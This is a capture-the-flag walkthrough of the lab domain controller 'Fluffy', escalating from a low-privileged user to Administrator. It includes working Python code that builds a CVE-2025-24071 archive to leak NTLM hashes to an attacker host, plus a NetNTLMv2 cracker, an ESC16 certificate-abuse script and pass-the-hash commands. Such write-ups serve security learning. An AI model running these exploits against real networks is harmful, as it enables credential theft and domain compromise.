πŸ‘ Fluffy

Machine: Fluffy
Difficulty: Easy
Theme: Assumed breach → NTLM capture → ACL abuse → Shadow credentials → ADCS abuse → Administrator


🎯 Summary

Fluffy starts with valid low-privileged domain credentials for j.fleischman (an assumed-breach scenario). A writable SMB share contains a PDF notice referencing CVE-2025-24071. By planting an archive that triggers that bug, another user's NetNTLMv2 response can be captured with Responder and cracked offline, giving access to p.agila.

Further Active Directory enumeration reveals a transitive ACL path:

  • p.agila can add itself to the Service Accounts group (GenericAll inherited through Service Account Managers)
  • that group has GenericWrite over winrm_svc and ca_svc

This allows:

  • shadow credential abuse to recover hashes for those service accounts
  • WinRM access via winrm_svc
  • ADCS abuse via ca_svc
  • escalation to Administrator

1. Enumeration

Initial scanning showed:

  • SMB
  • LDAP / LDAPS
  • Kerberos
  • WinRM

This immediately identified the target as a Domain Controller.

The domain and DC hostname were added to /etc/hosts:

echo "10.10.11.69 fluffy.htb dc01.fluffy.htb" | sudo tee -a /etc/hosts

A quick SMB enumeration with the provided credentials showed a writable share called IT.

nxc smb 10.10.11.69 -u 'j.fleischman' -p '<REDACTED>' --shares

Then:

smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
ls
get Upgrade_Notice.pdf

The interesting file was Upgrade_Notice.pdf.


2. Initial Foothold via CVE-2025-24071

The PDF referenced CVE-2025-24071, a Windows File Explorer vulnerability: when an archive containing a .library-ms file is extracted, Explorer parses the library definition and follows the UNC path inside it, authenticating to that host with the current user's NTLM credentials. The extraction itself triggers the outbound authentication; nobody has to open the extracted file.

Since the IT share was writable, the next move was:

  1. generate a malicious ZIP whose .library-ms points at the attacker's tun0 address
  2. upload it to the share
  3. wait for a user on the Windows side to extract it, which triggers an NTLM authentication attempt
  4. capture the NetNTLMv2 response with Responder

The UNC path baked into the .library-ms must be the same address Responder listens on; a payload pointing anywhere else produces no capture.

Create the malicious ZIP

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
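What the PoC builds, as an added self-contained example for this page (it is not the 0x6rss script, and the listener address 10.10.14.5 is a hypothetical tun0 IP): a ZIP holding a .library-ms file whose <simpleLocation><url> is a UNC path to the attacker host. The same block carries a defender-side scanner that lists the UNC targets in any archive, which is the check you would run on a share before trusting its contents.

```python
"""Build a CVE-2025-24071-style archive: a ZIP holding a .library-ms file
whose <simpleLocation><url> is a UNC path to the attacker host, plus a
defender-side scanner that lists those UNC targets in any archive.
Added example written for this page; it is not the 0x6rss PoC."""
import io
import zipfile
import xml.etree.ElementTree as ET

# Assumed listener address: the Responder host on tun0 (hypothetical value).
LISTENER_IP = "10.10.14.5"
LIB_NS = "http://schemas.microsoft.com/windows/2009/library"

# Minimal library definition; Explorer resolves the <url> when the archive
# is extracted and authenticates to it with the current user's credentials.
LIBRARY_MS_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>__UNC__</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def unc_path(listener_ip: str, share: str = "shared") -> str:
    """\\\\<listener>\\<share>; the share name is arbitrary, the host is what matters."""
    return f"\\\\{listener_ip}\\{share}"


def build_library_ms(listener_ip: str, share: str = "shared") -> str:
    return LIBRARY_MS_TEMPLATE.replace("__UNC__", unc_path(listener_ip, share))


def build_zip(listener_ip: str, entry_name: str = "Upgrade_Notice.library-ms") -> bytes:
    """Return the ZIP bytes; the entry name is arbitrary, only the extension matters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, build_library_ms(listener_ip))
    return buf.getvalue()


def extract_unc_targets(zip_bytes: bytes) -> list:
    """Defender-side check: every UNC <url> inside .library-ms entries of an archive."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            for url in root.iter(f"{{{LIB_NS}}}url"):
                if url.text and url.text.startswith("\\\\"):
                    targets.append(url.text)
    return targets


if __name__ == "__main__":
    with open("exploit.zip", "wb") as fh:
        fh.write(build_zip(LISTENER_IP))
    print(extract_unc_targets(build_zip(LISTENER_IP)))
```

Running the block writes exploit.zip for the listener address at the top and prints the UNC path the scanner finds in it; point the scanner at any archive pulled from a share to see where it would make Explorer authenticate.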

Upload it

smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
put exploit.zip

Start Responder

sudo responder -I tun0

After a short wait, Responder logged a NetNTLMv2 response for p.agila.

Crack the hash

Save the Responder line (user::DOMAIN:challenge:proof:blob) to a file and run hashcat in NetNTLMv2 mode (5600):

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

This recovered:

  • p.agila : <REDACTED>
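What hashcat -m 5600 is computing, as an added example for this page (not the box's capture): the NetNTLMv2 proof is HMAC-MD5 keyed by HMAC-MD5(NT hash, upper(user)+domain) over the server challenge and the client blob, so a captured line can be checked against any candidate password offline. The capture line, the password Winter2025! and the challenge/blob bytes are constructed here; MD4 is implemented inline because OpenSSL 3 builds often ship without it.

```python
"""What hashcat -m 5600 computes: derive the NetNTLMv2 proof for a candidate
password and compare it with the captured one. Added example for this page;
the capture line is constructed here (password is hypothetical), not the one
taken from Responder on the box. MD4 is implemented inline because OpenSSL 3
builds frequently ship without it."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, used for the NT hash (MD4 of the UTF-16LE password)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT, upper(user)+domain), server_challenge || blob)."""
    v2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> Tuple[str, str, bytes, bytes, bytes]:
    """Split a Responder/hashcat 5600 line: USER::DOMAIN:challenge:proof:blob."""
    user, _, rest = line.strip().partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_candidate(line: str, password: str) -> bool:
    user, domain, chal, proof, blob = parse_5600(line)
    return hmac.compare_digest(ntlmv2_proof(password, user, domain, chal, blob), proof)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """The offline attack in miniature: first candidate whose proof matches, else None."""
    for candidate in wordlist:
        if check_candidate(line, candidate):
            return candidate
    return None


def forge_capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a 5600-format line for a known password (to exercise the checker offline)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed capture: fixed server challenge and a minimal NTLMv2 blob
# (RespType 01 01, 6 reserved bytes, timestamp, client challenge, 4 reserved bytes).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "a0" * 8 + "b1" * 8 + "00000000")
SAMPLE_PASSWORD = "Winter2025!"  # hypothetical, not the real p.agila password
SAMPLE_LINE = forge_capture_line("p.agila", "FLUFFY", SAMPLE_PASSWORD, SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(crack(SAMPLE_LINE, ["password", "Summer2024", SAMPLE_PASSWORD]))
```

The point of seeing it written out: the server challenge and the client blob are in the capture in clear, so the only secret input is the NT hash, and the NT hash is a plain MD4 of the password. That is why a rockyou pass through mode 5600 is cheap, and why the same response cannot be relayed or reused once the challenge has expired; it is only the password that is at stake.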

3. Active Directory Enumeration with BloodHound

With p.agila, the AD environment was enumerated.

bloodhound-python -d fluffy.htb -u 'p.agila' -p '<REDACTED>' -dc 'dc01.fluffy.htb' -c all -ns 10.10.11.69
sudo neo4j console

The critical findings were:

  • p.agila is a member of Service Account Managers
  • Service Account Managers has GenericAll over the Service Accounts group
  • the Service Accounts group has GenericWrite over:
    • ca_svc
    • winrm_svc
    • ldap_svc

This gave a clean privilege escalation path: GenericAll on a group includes the right to add members, and GenericWrite on a user account is enough to write msDS-KeyCredentialLink, which is all shadow credentials need.


4. Add p.agila to service accounts

bloodyAD -u 'p.agila' -p '<REDACTED>' -d fluffy.htb --host 10.10.11.69 add groupMember 'service accounts' p.agila

That successfully added p.agila to the group.


5. Shadow Credentials on Service Accounts

With the new group membership, p.agila inherits the GenericWrite rights of Service Accounts. certipy's shadow auto uses that to write a key credential into msDS-KeyCredentialLink on the target, authenticates with it over PKINIT, recovers the NT hash from the resulting ticket (UnPAC-the-hash), and then restores the attribute's previous value. This was done for:

  • ca_svc
  • winrm_svc

This yielded their NT hashes.

certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account ca_svc
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account winrm_svc

If Kerberos time skew becomes an issue:

sudo ntpdate dc01.fluffy.htb

Recovered:

  • ca_svc : <REDACTED>
  • winrm_svc : <REDACTED>

6. WinRM Shell as winrm_svc

Since winrm_svc is part of Remote Management Users, WinRM access worked immediately.

evil-winrm -u 'winrm_svc' -H <REDACTED> -i dc01.fluffy.htb

From there:

whoami
type C:\Users\winrm_svc\Desktop\user.txt

This provided the user flag.


7. Enumerate ADCS

The next step was confirming Active Directory Certificate Services.

nxc ldap 10.10.11.69 -u 'winrm_svc' -H <REDACTED> -M adcs

Then enumerate vulnerable certificate configuration:

certipy-ad find -u 'ca_svc' -hashes <REDACTED> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout

The important finding was ESC16: the CA has the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2) on its DisableExtensionList, so every certificate it issues lacks the requester's SID. Without that SID, and as long as the DC is not in full enforcement of strong certificate mapping, the KDC maps a certificate to an account by the UPN in its SAN, which is exactly what the next step abuses.


8. Abuse ca_svc to Request an Administrator Certificate

The path used was:

  1. change the UPN of ca_svc to administrator (possible because Service Accounts has GenericWrite over ca_svc)
  2. request a certificate as ca_svc from a template that builds the SAN from the requester's UPN (User)
  3. restore the original UPN
  4. authenticate with the certificate, which the KDC now maps to Administrator
  5. recover Administrator's NT hash

Restoring the UPN is not optional: while it points at administrator, ca_svc cannot log on by UPN, and the change is a loud, easily audited modification of a service account.

Change UPN

certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'administrator'

Request certificate

certipy-ad req -u 'ca_svc' -hashes <REDACTED> -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

certipy names the output after the UPN it found in the issued certificate, so this produced:

  • administrator.pfx

Restore original UPN

certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'ca_svc@fluffy.htb'

Authenticate with the certificate

certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69

Because the certificate carries no SID extension, the KDC mapped it by UPN and issued a TGT for Administrator; certipy then pulled the NT hash out of it. This recovered:

  • Administrator NT hash: <REDACTED>
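The UPN swap, request and restore as one guarded sequence. This is an added example for this page, not part of certipy: it wraps the same certipy-ad commands shown above so that the restore always runs, even when the request step fails (the failure mode the Diagnostic Map below calls out). It assumes the original UPN was <account>@<domain>, as on this box; check the current UPN before swapping if that is not certain. The hostnames, CA name and DC address are the ones on this page.

```python
"""Run the ESC16 UPN-swap sequence so that the target's original UPN is
restored even if the certificate request fails. Added example; it wraps
the certipy-ad commands from the writeup and is not part of certipy."""
import subprocess
import sys
from typing import Callable, List, Sequence

# Environment values for this box; change them for another engagement.
DOMAIN = "fluffy.htb"
DC_IP = "10.10.11.69"
DC_HOST = "dc01.fluffy.htb"
CA_NAME = "fluffy-DC01-CA"

Runner = Callable[[Sequence[str]], None]


def run_cmd(argv: Sequence[str]) -> None:
    """Default runner: execute the command and raise on a non-zero exit."""
    subprocess.run(list(argv), check=True)


def upn_update_cmd(ctrl_user: str, ctrl_pass: str, target: str, upn: str) -> List[str]:
    """certipy-ad account update; ctrl_user needs write access to target
    (here p.agila via GenericWrite from the Service Accounts group)."""
    return ["certipy-ad", "account", "update",
            "-username", f"{ctrl_user}@{DOMAIN}", "-p", ctrl_pass,
            "-user", target, "-upn", upn]


def req_cmd(target: str, target_hash: str, template: str = "User") -> List[str]:
    """certipy-ad req as the target account (pass-the-hash) from a UPN-based template."""
    return ["certipy-ad", "req", "-u", target, "-hashes", target_hash,
            "-dc-ip", DC_IP, "-target", DC_HOST, "-ca", CA_NAME, "-template", template]


def esc16_request(ctrl_user: str, ctrl_pass: str, target: str, target_hash: str,
                  victim_upn: str = "administrator", run: Runner = run_cmd) -> str:
    """Swap UPN -> request cert -> restore UPN. The restore runs in `finally`,
    so a failed request never leaves the service account with a foreign UPN.
    Assumes the original UPN was <target>@<DOMAIN>."""
    original_upn = f"{target}@{DOMAIN}"
    run(upn_update_cmd(ctrl_user, ctrl_pass, target, victim_upn))
    try:
        run(req_cmd(target, target_hash))
    finally:
        run(upn_update_cmd(ctrl_user, ctrl_pass, target, original_upn))
    # certipy names the .pfx after the UPN it placed in the certificate
    return f"{victim_upn}.pfx"


if __name__ == "__main__":
    # usage: esc16.py <ctrl_user> <ctrl_pass> <target> <target_nt_hash>
    print(esc16_request(*sys.argv[1:5]))
```

After the .pfx is written, the page's certipy-ad auth step is unchanged. Running the restore in finally also keeps the sequence idempotent under retry: a second attempt starts from the correct UPN rather than from a half-applied state.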

9. Final Shell as Administrator

With the Administrator NT hash, WinRM access to the DC was straightforward.

evil-winrm -u 'Administrator' -H <REDACTED> -i dc01.fluffy.htb

Then:

whoami
type C:\Users\Administrator\Desktop\root.txt

This completed the box.


🔗 Condensed Attack Chain

j.fleischman
  ↓
Writable SMB share (IT)
  ↓
Upgrade_Notice.pdf → CVE-2025-24071 clue
  ↓
Responder capture
  ↓
p.agila
  ↓
BloodHound
  ↓
Add p.agila to "service accounts"
  ↓
Shadow credentials on winrm_svc + ca_svc
  ↓
WinRM as winrm_svc
  ↓
ADCS enumeration
  ↓
ESC16
  ↓
Modify ca_svc UPN to administrator
  ↓
Request certificate
  ↓
Authenticate as Administrator
  ↓
WinRM as Administrator

🧠 Key Takeaways

  • Writable shares plus user interaction can quickly yield new credentials.
  • BloodHound is most valuable when used to identify transitive control paths.
  • Shadow credentials are extremely effective once ACL abuse is available.
  • ADCS remains one of the most dangerous misconfiguration surfaces in AD.
  • ESC16 can allow privilege escalation even when no certificate template looks abusable on its own, because the weakness sits in the CA configuration rather than in a template.

⚡ Commands Cheat Sheet

# SMB enumeration
nxc smb 10.10.11.69 -u 'j.fleischman' -p '<REDACTED>' --shares
 
# Upload exploit
smbclient '//10.10.11.69/IT' -U 'j.fleischman%<REDACTED>'
 
# Responder
sudo responder -I tun0
 
# Crack NTLMv2
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
 
# BloodHound collection
bloodhound-python -d fluffy.htb -u 'p.agila' -p '<REDACTED>' -dc 'dc01.fluffy.htb' -c all -ns 10.10.11.69
 
# Add group member
bloodyAD -u 'p.agila' -p '<REDACTED>' -d fluffy.htb --host 10.10.11.69 add groupMember 'service accounts' p.agila
 
# Shadow creds
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account ca_svc
certipy-ad shadow auto -username p.agila@fluffy.htb -password '<REDACTED>' -account winrm_svc
 
# WinRM foothold
evil-winrm -u 'winrm_svc' -H <REDACTED> -i dc01.fluffy.htb
 
# ADCS check
nxc ldap 10.10.11.69 -u 'winrm_svc' -H <REDACTED> -M adcs
certipy-ad find -u 'ca_svc' -hashes <REDACTED> -dc-ip 10.10.11.69 -vulnerable -enabled -stdout
 
# UPN abuse
certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'administrator'
 
# Cert request
certipy-ad req -u 'ca_svc' -hashes <REDACTED> -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
 
# Restore UPN
certipy-ad account update -username "p.agila@fluffy.htb" -p "<REDACTED>" -user ca_svc -upn 'ca_svc@fluffy.htb'
 
# Auth with cert
certipy-ad auth -pfx administrator.pfx -domain 'fluffy.htb' -dc-ip 10.10.11.69
 
# Final shell
evil-winrm -u 'Administrator' -H <REDACTED> -i dc01.fluffy.htb

Field-manual techniques demonstrated on this box:


🧭 Diagnostic Map

Quick lookup of common failure signals seen on this machine and the correct recovery move. Use this when output looks “wrong” but the underlying step is actually salvageable.

Symptom: No NTLMv2 hash captured after uploading the malicious ZIP
Meaning: Responder is up but not on the path the victim reaches, or the share never triggered
Next: Confirm Responder is on the VPN interface (-I tun0), the IT share is writable, and a Windows user actually browses it

Symptom: certipy-ad shadow auto fails with a Kerberos / clock-skew error
Meaning: Local clock has drifted from the DC; Kerberos rejects the auth
Next: Sync time to the DC: sudo ntpdate dc01.fluffy.htb and retry

Symptom: certipy-ad find -vulnerable reports no vulnerable templates
Meaning: ESC16 is a CA-level misconfiguration (the security extension is disabled on the CA itself), not a per-template one, so it is reported under the CA's own findings
Next: Don't stop at the template list; read the CA section of the find output and look for the ESC16 finding

Symptom: administrator.pfx works, but ca_svc can no longer authenticate by UPN
Meaning: the UPN was switched to administrator and never restored, so the service account is still carrying the wrong identity
Next: Restore the original UPN (ca_svc@fluffy.htb) with certipy-ad account update as soon as the certificate is issued, before doing anything else

Symptom: Have the Administrator NT hash but RDP/SMB rejects it
Meaning: the hash is fine; the client is not performing pass-the-hash (RDP only accepts an NT hash in Restricted Admin mode), so the rejection is about the protocol, not the credential
Next: Use the WinRM path, which is in scope here: evil-winrm -u Administrator -H <NT_HASH> -i dc01.fluffy.htb


📝 Personal Notes

The decisive step on Fluffy is not the initial credential or the SMB share by itself. The real turning point is recognizing that p.agila’s group relationships create a service-account control path that leads directly into both:

  • a WinRM-capable account
  • and a CA-related account

Once that is clear, the box becomes a clean ACL + ADCS chain rather than a collection of unrelated Windows techniques.